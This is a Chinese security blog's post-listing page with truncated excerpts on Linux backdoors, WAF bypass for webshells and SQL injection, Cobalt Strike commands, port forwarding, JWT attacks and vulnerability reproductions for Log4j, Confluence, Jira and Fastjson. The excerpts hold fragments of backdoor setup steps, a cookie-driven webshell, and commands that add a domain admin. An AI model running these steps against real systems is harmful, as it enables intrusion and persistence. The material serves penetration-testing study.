自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Shanfenglan's blog

Nobody can stop my step

  • 博客(237)
  • 收藏
  • 关注

原创 杂记----

1.echo命令会覆盖之前文件里面的东西

2020-12-04 17:06:05 53467 10

原创 linux后门记录

文章目录tsh正向反向openssh后门利用openssh5.9p适用于任何版本的opensshapache rootme后门tsh正向vim tsh.h#删除两个call_back字段设置密码make linux执行./tshd在控制端执行./tsh ip反向git clone https://github.com/orangetw/tsh.gitcd tshvim tsh.h #控制端make linux./tsh cb#被控端umask 077; HOME=/var

2022-05-12 10:13:33 1059

原创 centos搭建dns服务器

过程1. 安装bindyum install -y bind2. 修改配置文件1. /etc/name.conf将其中所有的localhost改为any2. /etc/name.rfc1912.zoneszone "test.com" IN { type master; file "test.com.zone"; allow-update { none; };};zone "171.168.192.in-addr.arpa" IN {

2022-04-28 19:04:20 2071

原创 网络基础知识回顾

文章目录交换机路由器防火墙vlan协议PPTPL2TPGREhttp头http请求头http响应头常见http响应码交换机主要作用是将数据包分配给指定mac地址的机器。在数据链路层根据mac地址分配数据包,交换机可以组成局域网。路由器主要作用就是将数据包根据路由规则走最有效率的路由路径送往不同的目的地,中间会跨网段。在网络层根据ip地址传递数据包,可以让数据包在不同的网段间流通,通过不同的路由策略到达最终的目标。可以通过在路由器上配置访问列表,达到防火墙的部分效果。具体效果为,限制具体时间段可

2022-04-27 09:32:02 4055

原创 投资学习笔记

行业相关电子行业:长期看好,制造业才是未来,不过现在整体估值偏高,几乎接近上个最高点。白酒行业:估值非常高,但是业绩也非常好,可以慢慢定投。新能源行业:发展不错,快接近上一个高点,但是有国家政策在扶持,可以持有一部分赌一把。半导体行业:广发高端制造里面含有一部分,暂时不想入手,风险太大,以后看政策再说。消费行业:非周期性行业,股价回调约百分之二十,可以买一部分。医疗行业:大盘向上它向下,已经清仓,等主力进入的时候我们可以进入。化工行业:利润不错,上流行业,混合基金里面含有这个板块。军工:周期

2022-04-01 17:16:21 51247 6

原创 springmvc基础知识点学习

文章目录1. 常见注解1. @RequestMapping2. @ResponseBody3. @RequestBody4. @RequestParam5. @RestController6. @Controller7. @SessionAttributes2. Model类1. ModelAndView类2. Map类3. springmvc工作流1. 常见注解有点类似于提前编写好的一些函数,使用注解就是使用这些函数来实现自己的一些目的.1. @RequestMapping它是用来做映射的.@R

2022-03-31 17:53:01 328

原创 数据安全建设学习

文章目录1. 数据安全建设需要解决的问题1.1 敏感数据识别1.2 数据审计1.3 数据脱敏1.4 数据泄露检测与防护(DLP系统)1.5 数据恢复功能1.6 数据加解密功能2. 等保中对数据安全的要求与解决方案2.1 数据完整性2.2 数据保密性2.3 数据备份恢复1. 数据安全建设需要解决的问题1.1 敏感数据识别从海量数据中发现和锁定保护对象,通过内置算法规则和自定义敏感数据识别规则,对其存储的数据库类型数据以及非数据库类型文件进行整体扫描、分类、分级,并根据结果做进一步的安全防护,如细粒度访问

2022-03-31 09:55:51 3973

原创 java代码审计-java基础-3

1. 通过注入读取spring datasource配置信息<%@ page contentType="text/html;charset=UTF-8" language="java" %><%@ page import="org.springframework.context.ApplicationContext" %><%@ page import="org.springframework.web.context.support.WebApplicationConte

2022-03-18 19:49:26 5305

原创 java代码审计-java基础-2

文章目录1. 文件读取1. 文件读取常用的有java.io和java.nio,java.nio的实现是sun.nio.如果rasp监控了java.io里面的读文件的类,我们就可以使用java.nio来绕过监控并实现相同的功能.

2022-03-15 20:03:39 943

原创 gMSA相关知识学习

1. 什么是gMSA?gMSA就是windows2012后面新增加的一个安全机制,是一个服务账户的密码,每台机器上都有,可以通过kdc去获取也可以在目标机器上直接读取,特点是30天更换一次。2. 读取gMSA需要的条件如果攻击者拥有访问指定账户msDS-ManagedPassword属性的权限,则攻击者可以读取目标的gMSA 密码,也就是目标服务密码。域管与机器账户自己还有那台机器上的管理员账户有这个权限。攻击者如果拥有KDS根密钥,就可以读取任意用户的gMSA密码,这个kds 根密钥有点

2022-03-14 21:57:58 775

原创 spring、springboot、spring cloud、微服务是什么?

1. 什么是spring?Spring是一个支持快速开发Java EE应用程序的框架。2. 什么是spring boot?Spring Boot是一个基于Spring的套件,它帮我们预组装了Spring的一系列组件,以便以尽可能少的代码和配置来开发基于Spring的Java应用程序。本质上还是使用的spring框架,只是通过spring boot来使用的话,学习成本低很多,少了很多配置上的困难.3. 什么是spring cloud?一套基于spring boot的专门用于微服务的开发框架,sp

2022-03-12 09:12:37 465

原创 网络安全等保/安全合规总结

文章目录1. 什么是合规?2. 什么是等保2.0?3. 做了等保有什么好处?4. 什么时候需要复测?等保复测需要重新定级吗?5. 等保具体流程是什么?6. 等保3级需要测试哪些东西和具体的解决方案?1. 身份鉴别2. 访问控制3. 安全审计4. 入侵防范5. 可信验证6. 数据完整性7. 数据保密性8. 数据备份恢复7. 安全能力建设的方向1. 什么是合规?符合网络安全法律法规,在国内可以理解成符合等保2.0要求.2. 什么是等保2.0?全名是网络安全等级保护2.0,是一套标准.监管机构会根据这套

2022-03-09 11:04:00 8645 1

原创 java安全知识总结

cc1cc2shirofastjsonthinkphp内存马

2022-02-22 15:57:45 3105

原创 windows应急响应常见检查点

1.用户账号和组审计1)描述:黑客通常对系统进行入侵后会添加后门账号,所以需要审计用户和组是否有被篡改的痕迹。2)命令:lusrmgr.exe3)检查方法:查看是否有可疑的用户名被创建,检查是否administrators组里有可疑的账户被授权。2.自启动配置审计1)描述:黑客修改自启动配置通常可以在系统启动之后加载黑客自定义脚本。2)命令:msconfig.exe 或 wmic start up list full3)检查方法:检查自启动程序信息,如非常规应用程序则需要定位程序位置,可配

2022-02-21 13:02:11 3111 1

原创 企业如何快速落地sdl

文章目录1. SDL1.2 安全实践1. 提供安全培训DevSecOps1. SDL中文名软件开发生命周期,微软提出的一个软件安全开发的流程,其核心理念就是将安全考虑集成在软件开发的每一个阶段:需求分析、设计、编码、测试和维护。从需求、设计到发布产品的每一个阶段每都增加了相应的安全活动与规范,以减少软件中漏洞的数量并将安全缺陷降低到最小程度。安全开发生命周期 (SDL)是侧重于软件开发的安全保证过程,旨在开发出安全的软件应用。1.2 安全实践所有类型产品在研发过程中必须实现的行为。1. 提供安全培

2022-02-19 22:06:12 968

原创 Fastjson不出网利用

文章目录1. org.apache.tomcat.dbcp.dbcp2.BasicDataSource2.com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl3. 双亲委派3.1 实现3.2 主动破坏双亲委派机制的方法3.3 为什么要破坏双亲委派3.4 为什么Tomcat要破坏双亲委派4. 参考文章1. org.apache.tomcat.dbcp.dbcp2.BasicDataSource条件:BasicDataSource只需要有dbc

2022-02-19 12:42:41 5602 1

原创 零信任学习记录

1. 理念· 网络无时无刻不处于危险的环境中。· 网络中自始至终存在外部或内部威胁。· 网络的位置不足以决定网络的可信程度。· 所有的设备、用户和网络流量都应当经过认证和授权。· 安全策略必须是动态的,并基于尽可能多的数据源计算而来。**默认情况下不应该信任网络内部和外部的任何人/设备/系统,需要基于认证和授权重构访问控制的信任基础。零信任对访问控制进行了范式上的颠覆,其本质是以身份为基石的动态可信访问控制。**零信任架构应该结合终端、EDR、业务行为、网

2022-02-17 23:13:54 2177

原创 等保与ISO27001

文章目录1. 区别2. 建立ISMS的四个基本阶段参考文章1. 区别ISO27001是国际上的信息安全合规标准,等保是国内的合规标准。如今ISMS已经成为信息安全领域的热门话题。基于国际标准ISO/IEC27001的信息安全管理体系(InformationSecurity Management System, ISMS)是目前国际上得到公认的先进的信息安全解决方案,已为越来越多的组织所采用。浅谈等保与ISO270012. 建立ISMS的四个基本阶段建立信息安全管理体系(ISMS)一般要经过下列P

2022-02-16 11:23:00 1273

原创 java代码审计-java基础-1

1. 基础知识jvmjava反射机制复习利用反射机制,可以调用类中protected属性的方法。想要创建一个类的对象或者说实例就必须将先将这个class文件加载到jvm中。Java中class的加载方式分为显式和隐式,显式即我们通常使用Java反射或者ClassLoader来动态加载一个类对象,而隐式指的是类名.方法名()或new类实例。显式类加载方式也可以理解为类动态加载,我们可以自定义类加载器去加载任意的类。Class.forName("类名")默认会初始化被加载类的静态属性和方法,如果不希

2022-02-14 18:40:36 834

原创 web渗透中bypass防护系统

文章目录1. webshell执行命令2. sql注入2.1 安全狗mssqlmysql2.2 云盾mysql2.3 云锁mysqlfastjsonsafeline参考文章1. webshell执行命令文件上传后向webshell传参数:三重url编码三重base64编码cookie传参参数污染http://test/xx.jsp?a=xxx很多的垃圾字符xxx&cmd=whoamicookie传参对应webshell:x=ls<?php$p=$_COOKI

2022-01-25 13:54:09 2944

原创 k8s学习记录-细节学习与攻击利用

文章目录1. serviceaccount2. RBAC3. sercret4. ConfigMap5. cgroup、Procfs、Ptrace6. K8s Pod Security Policies参考文章1. serviceaccount本来只有节点机器可以访问api server,容器是无法访问apiserver的,如果在创建容器的时候给其配置了serviceaccount,那么这个容器也会有权限访问api server。如果不配置serviceaccount,则会使用默认的default账号

2022-01-18 15:13:14 1441

原创 k8s学习记录--搭建k8s集群

文章目录0.结构1. centos安装docker环境2. 安装kubeadm3. 更改配置文件:4. 搭建master节点5. 创建nodes节点并加入master6. 创建一个pod7. 进入pod8. 删除pod9. 使用cdk进行渗透测试1. 上传cdk2. 使用cdk进行脆弱点探测3. 攻击模块4. 工具模块参考文章0.结构一个master节点、一个node节点1. centos安装docker环境yum erase podman buildahsudo yum install -y

2022-01-18 13:30:34 1863

原创 k8s学习--什么是k8s

文章目录1. 什么是k8s(Kubernetes)2. k8s的结构3. 细节3.1 对象与pod3.2 用来管理pod的对象3.3 Restart policy3.4 master节点3.5 Node节点参考文章1. 什么是k8s(Kubernetes)一个用来管理容器的程序。Kubernetes中所有节点的集合体被称为Kubernetes集群,每个节点都是一台机器,这些节点上运行着Kubernetes 所管理的容器化应用,集群具有至少一个工作节点。Kubernetes 通过将容器放入在节点(Nod

2022-01-17 22:40:45 1262

原创 电子政务网-网络架构

1. 政务云电子政务云是为政府部门搭建一个底层的基础架构平台,把传统的政务应用迁移到平台上,去共享给各个政府部门,提高它的服务效率和服务的能力。考虑到电子政务系统在安全方面的特殊要求,电子政务云更适合选择私有云。公共服务云定位为由政府主导,整合公共资源,为公民和企业的直接需求提供云服务的创新型服务平台。根据公共服务的行业又可对公共服务云进行细分,如医疗云、社保云、园区云等。公共服务云需要整合各种公共资源,适宜部署到公有云中。一句话概括就是政府部门使用云技术实现的业务场景。不使用过去的物理机房,而是使用

2022-01-12 14:12:19 7793

原创 cs的常用命令操作

信息收集#列出正在登陆的用户net logons #列出域控(组)net domain_controllers#列出域控列表 net dclist #显示当前域 net domain #列出当前session net sessions #列出盘符 drives列出当前执行时间很久的任务并删除jobsjobkill取消正在下载的文件cancel 1.txt创建凭据并执行命令(无回显)工作组中如果两个机器密码或者说登陆凭据是相同的,那么可以直接dir \ip\c$ 成

2022-01-11 12:44:47 5073

原创 Exchange邮件pst数据的导出与查看

文章目录其他命令操作实现查看组织内已创建的管理角色给administrator添加邮件的导入导出权限创建共享文件夹邮件的导出痕迹清理powershell实现参考文章其他命令#提升 ‘scarlet’ 用户为域管权限 and 加入 Organization Management 组net user scarlet 123456 /addnet group "domain admins" scarlet /addnet group "Organization Management" scarlet /

2022-01-05 11:24:46 2756

原创 jwt攻击总结

文章目录1. 通过修改header中的alg字段实现攻击2. 通过爆破密钥3. 修改kid实现攻击4. 修改加密算法参考文章jwt格式举例如下,以点来分割,总共为三部分:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIyMzMzIiwibmFtZSI6Im5wZnMiLCJhZG1pbiI6dHJ1ZX0.mcHAMzOrqyqLk5-tmWVp1-zdlqIVcOdv-39oQIoOWoQjwt是一种类似于token、session的用户身份凭据。

2021-12-31 10:05:54 8732

原创 windows远程下载的新方案

文章目录1. 搭建dns服务器2. 将要下载的文件转化格式3. 将数据输入到dns服务器中4. 下载文件并执行5. 参考文章因为udp包最大只有65535byte,所以:只能传递66k以下的文件只能传递66k以下的文件只能传递66k以下的文件1. 搭建dns服务器yum -y updateyum -y install bind bind-chroot bind-utilsvim /etc/named.conf并添加 forwarders { 8.8.8.8; };,最终如下:修改

2021-12-30 22:18:24 2058

原创 spring相关漏洞复现

文章目录1. H2 Database web端未授权访问导致的rce2. Spring Security OAuth2 rce -- CVE-2016-49773. Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)4. Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)1. H2 Database web端未授权访问导致的rce2. Spring Security OAuth2 rce – CVE-2016-4977Spring Se

2021-12-30 18:50:06 1185

原创 socks服务搭建总结

文章目录1. 涉及到的工具2. frsocks1. 一层2. 两层3. 三层1. 涉及到的工具frsocksioxewfrpneo-regeorgtfirewall2. frsocks1. 一层frsocks_windows_386.exe -sockstype fsocks -listen 99992. 两层3. 三层

2021-12-24 17:02:53 2279

原创 端口复用实现

文章目录1. 前言2. 实现2.1 开启http服务2.2 开启socks服务2.3 通过protoplex实现端口复用2.4 最后一步端口转发2.5 最终效果参考文章1. 前言我们要实现的是外界访问80端口,根据协议不同的到的响应就不一样,使用的协议可以是socks也可以是http。2. 实现2.1 开启http服务python -m http.server 802.2 开启socks服务frsocks_windows_386.exe -sockstype fsocks -listen

2021-12-24 15:44:27 3822

原创 端口转发总结归纳

文章目录1. windows1.1 netsh基础命令1. 本地转发2. 远程转发1.2 natbypass基础命令1. 本地转发2. 远程转发1.3 ew基础命令1. 本地转发2. 远程转发2. linux2.1 iptables1. 本地转发2. 远程转发2.2 ssh1. 本地端口转发2. 远程端口转发3. socks代理4. 清除设置的代理2.3 firewall2.4 socat2.5 portmap1. 本地端口转发3. 参考文章1. windows1.1 netsh需要管理员权限防火墙

2021-12-21 16:14:36 8222 1

原创 java xstream组件反序列化漏洞复现

文章目录前言1. CVE-2021-213511.1 利用2. CVE-2021-295052.1 利用前言XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn_-RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令。

2021-12-16 23:30:00 2439

原创 Apereo CAS 4.1 反序列化命令执行漏洞复现

文章目录1. 前言2. 利用参考1. 前言Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。2. 利用条件:默认密钥没有被更改系统中存在可利用的漏洞链生成恶意payload,下面paylaod利用的是cc4的链:方法1:java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar Commo

2021-12-16 22:45:00 437

原创 java rmi register反序列化攻击

文章目录1. 前言2. 利用参考文章1. 前言被攻击的是 rmi register服务端,一般在1099端口。如果遇见了暴露的1099端口可以尝试攻击一下。2. 利用报错不用管,命令会正常执行报错不用管,命令会正常执行#发送给服务器payloads/JRMPLIstener数据,rmi服务器会开启一个服务,攻击者使用JRMPClient与这个服务进行通行进而进行命令执行。条件jdk<=jdk8u111java -cp ysoserial.jar ysoserial.exploit.J

2021-12-16 17:37:11 1792

原创 Apache activeMQ漏洞复现

文章目录1. ActiveMQ 反序列化漏洞(CVE-2015-5254)2. ActiveMQ任意文件写入漏洞(CVE-2016-3088)2.1 利用参考文章1. ActiveMQ 反序列化漏洞(CVE-2015-5254)Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。工具下载地址:http

2021-12-14 12:38:17 3166 1

原创 Aapche Dubbo Java反序列化漏洞复现

文章目录1. CVE-2019-17564原理利用1. CVE-2019-17564原理Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。影响版本:Apac

2021-12-13 14:36:20 1563

原创 apache log4j漏洞复现

文章目录1. Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)利用条件利用2. CVE-2019-17571利用条件利用3. apache log4j rce利用条件环境搭建利用1. Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。利用条件

2021-12-10 15:03:23 59742 8

原创 jira漏洞复现

文章目录1. Atlassian Jira 模板注入漏洞(CVE-2019-11581)1.1 利用参考文章1. Atlassian Jira 模板注入漏洞(CVE-2019-11581)影响版本4.4.x5.x.x6.x.x7.0.x7.1.x7.2.x7.3.x7.4.x7.5.x7.6.x before 7.6.14 (the fixed version for 7.6.x)7.7.x7.8.x7.9.x7.10.x7.11.x7.12.x7.13.x befor

2021-12-03 12:58:44 3712

原创 confluence漏洞复现

文章目录1. confluence路径穿越与命令之执行 (CVE-2019-3396)1.1 利用2. Confluence OGNL表达式注入代码执行漏洞(CVE-2021-26084)2.1 利用参考文章1. confluence路径穿越与命令之执行 (CVE-2019-3396)影响版本:6.14.2版本前通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。1.1 利用POST /rest/tinymce/1/macro/preview HTTP/1.1Host

2021-12-02 23:03:37 3102

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除